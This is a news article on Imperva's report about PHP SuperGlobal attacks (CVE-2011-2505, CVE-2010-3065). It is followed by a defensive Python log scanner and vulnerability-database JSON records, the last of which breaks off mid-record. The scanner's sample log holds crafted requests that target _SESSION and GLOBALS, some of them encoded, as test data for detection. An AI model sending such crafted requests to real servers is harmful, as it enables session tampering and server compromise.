Hackers are focusing on vulnerabilities in the PHP web application development platform, threatening 80% of the websites in the world, including many big websites such as Facebook and Wikipedia. PHP has several predefined variables called SuperGlobals, e.g. POST, GET, COOKIES and FILES.
Imperva has released a Hacker Intelligence Initiative [Report](<http://www.imperva.com/download.asp?id=421>) that is particularly concerned with two vulnerabilities that can be used to execute code on servers running PHP and that fail to stop **PHP SuperGlobal** parameter variables from being modified by external sources.
* **CVE-2011-2505** describes a vulnerability in the authentication feature of phpMyAdmin (PMA) that enables attackers to modify the **_SESSION** SuperGlobal variable.
* **CVE-2010-3065** describes a problem in PHP’s session serialization mechanism. By injecting a malicious value into an internal variable using PHP's SuperGlobal mechanism, the attacker is able to change the application flow and execute arbitrary commands to take control of the server.
“_Because compromised hosts can be used as botnet slaves to attack other servers, exploits against PHP applications can affect the general security and health of the entire web_,”
The vulnerability is particularly dangerous because PHP is so widely used, and it could be exploited by hackers for a variety of purposes. "_The effects of these attacks can be great, as the PHP platform is by far the most popular Web application development platform, powering more than 80% of all Web sites, including Facebook and Wikipedia. Clearly, it is time for the security community to devote more attention to this issue._"
They note that PHP applications do not protect against the modification of variables from external sources, such as query parameters or cookies.
The attacker can combine the two separate vulnerabilities to extend the scope of the flaws. “_Based on the captured malicious traffic, we were able to trace its origin and find the specific exploit code used to generate it in a hacker forum on the web._”
Imperva's research team noted an average of 144 attacks per application that contained attack vectors related to SuperGlobal parameters, for the purpose of remote code execution, remote file inclusion and security filter evasion attacks.
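
A defender-side check for the request pattern described above, as an added example (not from the article or the Imperva report): it scans request logs for query-string or cookie parameter names that address a PHP superglobal, including percent-encoded and double-encoded names. The log format, addresses and parameter values are constructed for illustration.

```python
import re
from collections import Counter

# The nine PHP superglobal arrays. PHP variable names are case-sensitive.
SUPERGLOBALS = {"GLOBALS", "_GET", "_POST", "_COOKIE", "_FILES",
                "_SERVER", "_ENV", "_REQUEST", "_SESSION"}

# Constructed log format (an assumption of this example):
#   <ip> "<METHOD> <target> <proto>" <status> "<Cookie header or ->"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) "(?P<cookie>[^"]*)"$'
)

# Constructed sample input; addresses come from documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 "GET /index.php?page=2&sort=name HTTP/1.1" 200 "lang=en; theme=dark"
198.51.100.7 "GET /index.php?_SESSION[k]=v HTTP/1.1" 200 "-"
198.51.100.7 "GET /index.php?%5FSESSION%5Bk%5D=v HTTP/1.1" 200 "-"
198.51.100.7 "GET /index.php?%255FSESSION%255Bk%255D=v HTTP/1.1" 200 "-"
203.0.113.5 "GET /app.php?id=7 HTTP/1.1" 200 "GLOBALS[k]=v; lang=en"
192.0.2.44 "GET /search.php?q=_SESSION+fixation HTTP/1.1" 200 "-"
"""


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded names are still caught."""
    from urllib.parse import unquote_plus
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def param_names(raw, sep):
    """Yield decoded parameter names from a query string ('&') or Cookie header (';')."""
    for pair in raw.split(sep):
        name = decode_fully(pair.split("=", 1)[0]).strip()
        if name:
            yield name


def superglobal_target(name):
    """Return the superglobal that a parameter name addresses, or None."""
    base = name.split("[", 1)[0]
    # PHP converts dots and spaces in incoming variable names to underscores,
    # so normalise the same way before comparing.
    base = base.replace(".", "_").replace(" ", "_")
    return base if base in SUPERGLOBALS else None


def scan(log_text):
    """Return (line number, source IP, 'query' or 'cookie', superglobal) findings."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skipped here, worth counting in production
        sources = [("query", m["target"].partition("?")[2], "&")]
        if m["cookie"] != "-":
            sources.append(("cookie", m["cookie"], ";"))
        for source, raw, sep in sources:
            for name in param_names(raw, sep):
                target = superglobal_target(name)
                if target:
                    findings.append((lineno, m["ip"], source, target))
    return findings


def by_source_ip(findings):
    """Count findings per source IP to surface repeat senders."""
    return Counter(ip for _, ip, _, _ in findings)


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for finding in results:
        print(finding)
    print(by_source_ip(results).most_common())
```

Only parameter names are inspected, so the last sample line, where `_SESSION` appears in a search value, is not flagged.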
{"id": "THN:4D010FAF46F8DECDF22AE08BD5AA6962", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Web Application Security : PHP SuperGlobal Variables are vulnerable to Hackers", "description": "[](<http://3.bp.blogspot.com/-bTNLqCBVA9M/Ui4I09g_PoI/AAAAAAAAXiI/XNMdet2ry9Y/s1600/Thanks+to+PHP+flaw,+80%25+websites+in+the+world+are+vulnerable+to+Hackers.png>)\n\nHackers are focusing on vulnerabilities in the PHP web application development platform threatening 80% websites in the world, including many big website i.e. Facebook and Wikipedia. PHP has several predefined variables that are called SuperGlobals i.e. POST, GET, COOKIES, FILES etc.\n\n \n\n\nImperva Releases Hacker Intelligence Initiative [Report](<http://www.imperva.com/download.asp?id=421>), particularly concerned about two vulnerabilities that can be used to execute code on servers running PHP and fail to stop **PHP SuperGlobal** parameter variables being modified by external sources. \n\n\n * Dubbed as **CVE-2011-2505**, describes a vulnerability in the authentication feature in PhpMyAdmin (PMA) that enables attackers to modify the **_SESSION** SuperGlobal variable.\n * **CVE-2010-3065** describes a problem in the PHP\u2019s session serialization mechanism. By injecting malicious value into an internal variable using PHP's Superglobal mechanism, the attacker is able to change the application flow and execute arbitrary commands to take control over the server.\n\n\u201c_Because compromised hosts can be used as botnet slaves to attack other servers, exploits against PHP applications can affect the general security and health of the entire web_,\u201d\n\n \n\n\nVulnerability is particularly dangerous due to the common use of PHP and could be used by hackers for a variety of purposes. \"_The effects of these attacks can be great, as the PHP platform is by far the most popular Web application development platform, powering more than 80% of all Web sites, including Facebook and Wikipedia. 
Clearly, it is time for the security community to devote more attention to this issue._\"\n\n \n\n\nThey note that PHP applications do not protect against the modification of variables from external sources, such as query parameters or cookies.\n\n[](<http://3.bp.blogspot.com/-oXZsVrTbU9k/Ui6nzeazkuI/AAAAAAAAXiY/Q0bMUL4anns/s1600/php+attack.png>)\n\nThe attacker can combine the two separate vulnerabilities to extend the scope of the flaws. \u201c_Based on the captured malicious traffic, we were able to trace its origin and find the specific exploit code used to generate it in a hacker forum on the web._\u201d\n\n \n\n\nImperva's research team noted an average of 144 attacks per application that contained attack vectors related to SuperGlobal parameters, for the purpose of remote code execution, remote file inclusion and security filter evasion attacks.\n", "published": "2013-09-09T06:45:00", "modified": "2013-09-10T05:09:44", "epss": [{"cve": "CVE-2010-3065", "epss": 0.00471, "percentile": 0.72851, "modified": "2023-11-13"}, {"cve": "CVE-2011-2505", "epss": 0.18568, "percentile": 0.95695, "modified": "2023-11-13"}], "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/", "score": 6.4}, "cvss2": {}, "cvss3": {}, "href": "http://thehackernews.com/2013/09/thanks-to-php-superglobal-80-websites.html", "reporter": "Mohit Kumar", "references": [], "cvelist": ["CVE-2010-3065", "CVE-2011-2505"], "immutableFields": [], "lastseen": "2017-01-08T18:01:16", "viewCount": 144, "enchantments": {"score": {"value": 2.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "centos", "idList": ["CESA-2010:0919"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-2986", "CPAI-2013-2987", "CPAI-2014-1799"]}, {"type": "cve", "idList": ["CVE-2010-3065", "CVE-2011-2505", "CVE-2011-2719"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2286-1:4CCEC"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2011-2505", "DEBIANCVE:CVE-2011-2719"]}, {"type": "dsquare", 
"idList": ["E-15"]}, {"type": "exploitdb", "idList": ["EDB-ID:17510", "EDB-ID:17514"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4274B90AFFC9170C6C5F19A5B572681A", "EXPLOITPACK:951813AECD0336F4B9E6C4A40606C23E"]}, {"type": "freebsd", "idList": ["7E4E5C53-A56C-11E0-B180-00216AA06FC2"]}, {"type": "gentoo", "idList": ["GLSA-201110-06", "GLSA-201201-01"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2010-0919.NASL", "DEBIAN_DSA-2089.NASL", "DEBIAN_DSA-2286.NASL", "FEDORA_2011-9144.NASL", "FREEBSD_PKG_7E4E5C53A56C11E0B18000216AA06FC2.NASL", "GENTOO_GLSA-201110-06.NASL", "GENTOO_GLSA-201201-01.NASL", "ORACLELINUX_ELSA-2010-0919.NASL", "PHPMYADMIN_PMASA_2011_8.NASL", "PHP_5_2_14.NASL", "PHP_5_3_3.NASL", "REDHAT-RHSA-2010-0919.NASL", "SL_20101129_PHP_ON_SL4_X.NASL", "SUSE_11_1_APACHE2-MOD_PHP5-100928.NASL", "SUSE_11_2_APACHE2-MOD_PHP5-100813.NASL", "SUSE_11_3_APACHE2-MOD_PHP5-100812.NASL", "SUSE_11_APACHE2-MOD_PHP5-100805.NASL", "SUSE_APACHE2-MOD_PHP5-7110.NASL", "UBUNTU_USN-989-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103188", "OPENVAS:1361412562310110171", "OPENVAS:1361412562310110182", "OPENVAS:1361412562310122295", "OPENVAS:136141256231069995", "OPENVAS:136141256231070769", "OPENVAS:136141256231070802", "OPENVAS:1361412562310831441", "OPENVAS:1361412562310840501", "OPENVAS:1361412562310863362", "OPENVAS:1361412562310870362", "OPENVAS:1361412562310880456", "OPENVAS:1361412562310880633", "OPENVAS:69995", "OPENVAS:70769", "OPENVAS:70802", "OPENVAS:831441", "OPENVAS:840501", "OPENVAS:863362", "OPENVAS:870362", "OPENVAS:880456", "OPENVAS:880633"]}, {"type": "oraclelinux", "idList": ["ELSA-2010-0919"]}, {"type": "osv", "idList": ["OSV:DSA-2089-1", "OSV:DSA-2286-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102908", "PACKETSTORM:102940", "PACKETSTORM:102941"]}, {"type": "phpmyadmin", "idList": ["PHPMYADMIN:PMASA-2011-5"]}, {"type": "redhat", "idList": ["RHSA-2010:0919"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:24800", 
"SECURITYVULNS:DOC:26645", "SECURITYVULNS:DOC:26749", "SECURITYVULNS:DOC:27147", "SECURITYVULNS:VULN:11165", "SECURITYVULNS:VULN:11785"]}, {"type": "seebug", "idList": ["SSV:20704", "SSV:20710", "SSV:20711", "SSV:20714", "SSV:26109"]}, {"type": "thn", "idList": ["THN:570BC20A68A3569A403256D8040A03BB"]}, {"type": "threatpost", "idList": ["THREATPOST:A04B08327D4E7C2B97F353216BAFA013"]}, {"type": "ubuntu", "idList": ["USN-989-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2010-3065", "UB:CVE-2011-2505", "UB:CVE-2011-2719"]}, {"type": "veracode", "idList": ["VERACODE:24428"]}]}, "backreferences": {"references": [{"type": "centos", "idList": ["CESA-2010:0919"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-2986", "CPAI-2014-1799"]}, {"type": "cve", "idList": ["CVE-2010-3065"]}, {"type": "dsquare", "idList": ["E-15"]}, {"type": "exploitdb", "idList": ["EDB-ID:17510"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:951813AECD0336F4B9E6C4A40606C23E"]}, {"type": "freebsd", "idList": ["7E4E5C53-A56C-11E0-B180-00216AA06FC2"]}, {"type": "gentoo", "idList": ["GLSA-201201-01"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/SUSE-CVE-2019-8666/"]}, {"type": "nessus", "idList": ["SUSE_11_1_APACHE2-MOD_PHP5-100928.NASL", "SUSE_APACHE2-MOD_PHP5-7110.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:69995", "OPENVAS:863362"]}, {"type": "oraclelinux", "idList": ["ELSA-2010-0919"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102940"]}, {"type": "phpmyadmin", "idList": ["PHPMYADMIN:PMASA-2011-5"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11165"]}, {"type": "seebug", "idList": ["SSV:20704"]}, {"type": "threatpost", "idList": ["THREATPOST:A04B08327D4E7C2B97F353216BAFA013"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2010-3065"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2010-3065", "epss": "0.004710000", "percentile": "0.718200000", "modified": "2023-03-14"}, {"cve": "CVE-2011-2505", "epss": "0.418950000", "percentile": "0.966930000", "modified": 
"2023-03-14"}], "vulnersScore": 2.2}, "_state": {"dependencies": 1699909029, "score": 1699909626, "epss": 0}, "_internal": {"score_hash": "210c3fbefbec4ab24f8d58db976a2c7e"}}
{"thn": [{"lastseen": "2023-05-11T00:22:28", "description": "[](<https://thehackernews.com/images/-bTNLqCBVA9M/Ui4I09g_PoI/AAAAAAAAXiI/XNMdet2ry9Y/s728-e365/Thanks+to+PHP+flaw,+80%25+websites+in+the+world+are+vulnerable+to+Hackers.png>)\n\nHackers are focusing on vulnerabilities in the PHP web application development platform threatening 80% websites in the world, including many big website i.e. Facebook and Wikipedia. PHP has several predefined variables that are called SuperGlobals i.e. POST, GET, COOKIES, FILES etc.\n\n \n\n\nImperva Releases Hacker Intelligence Initiative [Report](<https://www.imperva.com/download.asp?id=421>), particularly concerned about two vulnerabilities that can be used to execute code on servers running PHP and fail to stop **PHP SuperGlobal** parameter variables being modified by external sources. \n\n\n * Dubbed as **CVE-2011-2505**, describes a vulnerability in the authentication feature in PhpMyAdmin (PMA) that enables attackers to modify the **_SESSION** SuperGlobal variable.\n * **CVE-2010-3065** describes a problem in the PHP's session serialization mechanism. By injecting malicious value into an internal variable using PHP's Superglobal mechanism, the attacker is able to change the application flow and execute arbitrary commands to take control over the server.\n\n\"_Because compromised hosts can be used as botnet slaves to attack other servers, exploits against PHP applications can affect the general security and health of the entire web_,\"\n\n \n\n\nVulnerability is particularly dangerous due to the common use of PHP and could be used by hackers for a variety of purposes. \"_The effects of these attacks can be great, as the PHP platform is by far the most popular Web application development platform, powering more than 80% of all Web sites, including Facebook and Wikipedia. 
Clearly, it is time for the security community to devote more attention to this issue._\"\n\n \n\n\nThey note that PHP applications do not protect against the modification of variables from external sources, such as query parameters or cookies.\n\n[](<https://thehackernews.com/images/-oXZsVrTbU9k/Ui6nzeazkuI/AAAAAAAAXiY/Q0bMUL4anns/s728-e365/php+attack.png>)\n\nThe attacker can combine the two separate vulnerabilities to extend the scope of the flaws. \"_Based on the captured malicious traffic, we were able to trace its origin and find the specific exploit code used to generate it in a hacker forum on the web._\"\n\n \n\n\nImperva's research team noted an average of 144 attacks per application that contained attack vectors related to SuperGlobal parameters, for the purpose of remote code execution, remote file inclusion and security filter evasion attacks.\n", "cvss3": {}, "published": "2013-09-09T17:45:00", "type": "thn", "title": "Web Application Security : PHP SuperGlobal Variables are vulnerable to Hackers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3065", "CVE-2011-2505"], "modified": "2013-09-10T05:09:44", "id": "THN:570BC20A68A3569A403256D8040A03BB", "href": "https://thehackernews.com/2013/09/thanks-to-php-superglobal-80-websites.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T23:00:13", "description": "The ease with which PHP applications can be subverted should be pretty apparent by now given the number of [botnets 
supported by compromised sites hosting PHP code](<http://threatpost.com/fort-disco-brute-force-attack-campaign-targets-cms-websites>).\n\nThe biggest culprit in the PHP universe may be a set of nine variables called SuperGlobals that provide programmers with development flexibility yet introduce dangerous vulnerabilities that allow attackers to externally modify these variables and run code of their choosing, conduct remote file inclusion, or bypass intrusion detection signatures.\n\nResearch released today by Imperva [calls for a ban on SuperGlobal variables](<http://www.imperva.com/download.asp?id=421>), vulnerabilities which can be exploited to break application logic and hack servers hosting the wonky code. The result could be anything from fraud against online banking customers to loss of personal data.\n\n\u201cBecause compromised hosts can be used as botnet slaves to attack other servers, exploits against PHP applications can affect the general security and health of the entire Web,\u201d said Amichai Shulman, CTO at Imperva.\n\nImperva\u2019s research points out that 81 percent of websites host some PHP code, compared to, for example, ASP.NET which is found on 19 percent of sites, and Java on 3 percent. PHP SuperGlobal variables, meanwhile, are problematic because they can allow an outsider to remotely override internal variables with external input, Imperva said.\n\nImperva monitored two particular vulnerabilities: CVE-2011-2505, which is a flaw in the authentication feature of PhPMyAdmin (PMA) that enables hackers to modify the _SESSION SuperGlobal variable; and CVE-2010-3065, which enables the injection of arbitrary code strings into a serialized session.\n\nThe Imperva report said hackers can combine the two vulnerabilities and execute code on a server running PMA. 
A configuration object running in PMA would need to load two functions in order ro execute an injected configuration file.\n\n\u201cThe attacker can combine the two separate vulnerabilities, the former letting the attacker inject a value into the session, and the latter allowing the attacker to create arbitrary string to inject a maliciously crafted PMA_config object into the serialized session,\u201d the report said.\n\nIn May, researchers monitored attacks against PHP applications, the data collected via honeypots and from customer data. More than 3,000 requests were observed that manipulated SuperGlobal variables; those requests came from 27 source IP addresses against 24 Web applications; 55 percent of the attacks seen were against SuperGlobal parameters.\n\nThese vulnerabilities, Imperva said, are known to the security industry and popular scanners such as Nessus and Nikto already scan for them. But developers continue to use them in PHP applications. Attacks, however, have legs. One particular campaign observed by Imperva lasted five months and IP addresses from six countries were targeting sites in a number of critical industries, including financial services. Exploit code, meanwhile, was found on a popular Russian hacker forum.\n\n\u201cInterestingly, some of the attacking IP addresses targeted two to three applications simultaneously. The requests were probably generated by the same tool, as they contained distinct characteristics such as an identical, rarely user-agent string,\u201d the report said.\n\nAttackers are also intent on giving these PHP attacks some longevity by injecting behaviors that help them elude being detected by security software. The _REQUEST SuperGlobal variable is being abused in these instances, Imperva said. 
This particular variable works because, rather than expose a vulnerable portion of code, it functionally changes the parameters\u2019 names which can enable it to bypass an existing IDS signature, for example.\n\nThese attacks illustrate the need to keep PHP code up to date, in particular on third-party applications, because they\u2019re easily being exploited.\n\n\u201cAttackers are able to capture this complex attack scenario in a single script that can be used by a botnet operator without exceptional skills,\u201d the report said. \u201cThe script can be automatically distributed to compromised servers and executed autonomously to gain control or further servers.\u201d\n", "cvss3": {}, "published": "2013-09-09T14:54:04", "type": "threatpost", "title": "Call for Ban on Vulnerable PHP SuperGlobal Variables", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-3065", "CVE-2011-2505"], "modified": "2013-09-11T12:44:35", "id": "THREATPOST:A04B08327D4E7C2B97F353216BAFA013", "href": "https://threatpost.com/researchers-call-for-ban-on-php-superglobal-variables/102224/", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2023-12-02T15:07:50", "description": "libraries/auth/swekey/swekey.auth.lib.php in the Swekey authentication feature in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 assigns values to arbitrary parameters referenced in the query string, which allows remote attackers to modify the SESSION superglobal array via a crafted request, related to a \"remote variable manipulation vulnerability.\"", "cvss3": {}, "published": "2011-07-14T23:55:00", "type": "cve", "title": "CVE-2011-2505", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": 
"PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505"], "modified": "2023-11-07T02:07:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:3.2.2", "cpe:/a:phpmyadmin:phpmyadmin:3.4.2.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.5", "cpe:/a:phpmyadmin:phpmyadmin:3.3.9.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.5.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.3.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.9.2", "cpe:/a:phpmyadmin:phpmyadmin:3.4.0.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.10.1", "cpe:/a:phpmyadmin:phpmyadmin:3.2.1", "cpe:/a:phpmyadmin:phpmyadmin:3.1.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.8", "cpe:/a:phpmyadmin:phpmyadmin:3.0.0", "cpe:/a:phpmyadmin:phpmyadmin:3.0.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.0.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.8.1", "cpe:/a:phpmyadmin:phpmyadmin:3.4.3.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.3", "cpe:/a:phpmyadmin:phpmyadmin:3.3.2.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.4.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.5.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.3.0", "cpe:/a:phpmyadmin:phpmyadmin:3.0.1.1", "cpe:/a:phpmyadmin:phpmyadmin:3.1.3.2", "cpe:/a:phpmyadmin:phpmyadmin:3.3.9.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.10.0", "cpe:/a:phpmyadmin:phpmyadmin:3.4.1.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.4", "cpe:/a:phpmyadmin:phpmyadmin:3.1.2", "cpe:/a:phpmyadmin:phpmyadmin:3.3.1.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.6", "cpe:/a:phpmyadmin:phpmyadmin:3.2.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.7"], "id": "CVE-2011-2505", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2505", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3:*:*:*:*:*:*:*", 
"cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.4:rc2:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-02T14:24:48", "description": "The default session serializer in PHP 5.2 through 5.2.13 and 5.3 through 5.3.2 does not properly handle the PS_UNDEF_MARKER marker, which allows context-dependent attackers to modify arbitrary session variables via a crafted session variable name.", "cvss3": {}, "published": "2010-08-20T20:00:00", "type": "cve", "title": "CVE-2010-3065", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3065"], "modified": "2010-12-10T06:44:00", "cpe": ["cpe:/a:php:php:5.2.5", "cpe:/a:php:php:5.2.8", "cpe:/a:php:php:5.2.9", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:5.3.1", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:5.2.12", "cpe:/a:php:php:5.2.13", "cpe:/a:php:php:5.2.4", "cpe:/a:php:php:5.3.2", "cpe:/a:php:php:5.2.7", "cpe:/a:php:php:5.2.10", "cpe:/a:php:php:5.3.0", "cpe:/a:php:php:5.2.11", "cpe:/a:php:php:5.2.3", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:5.2.1"], "id": "CVE-2010-3065", "href": 
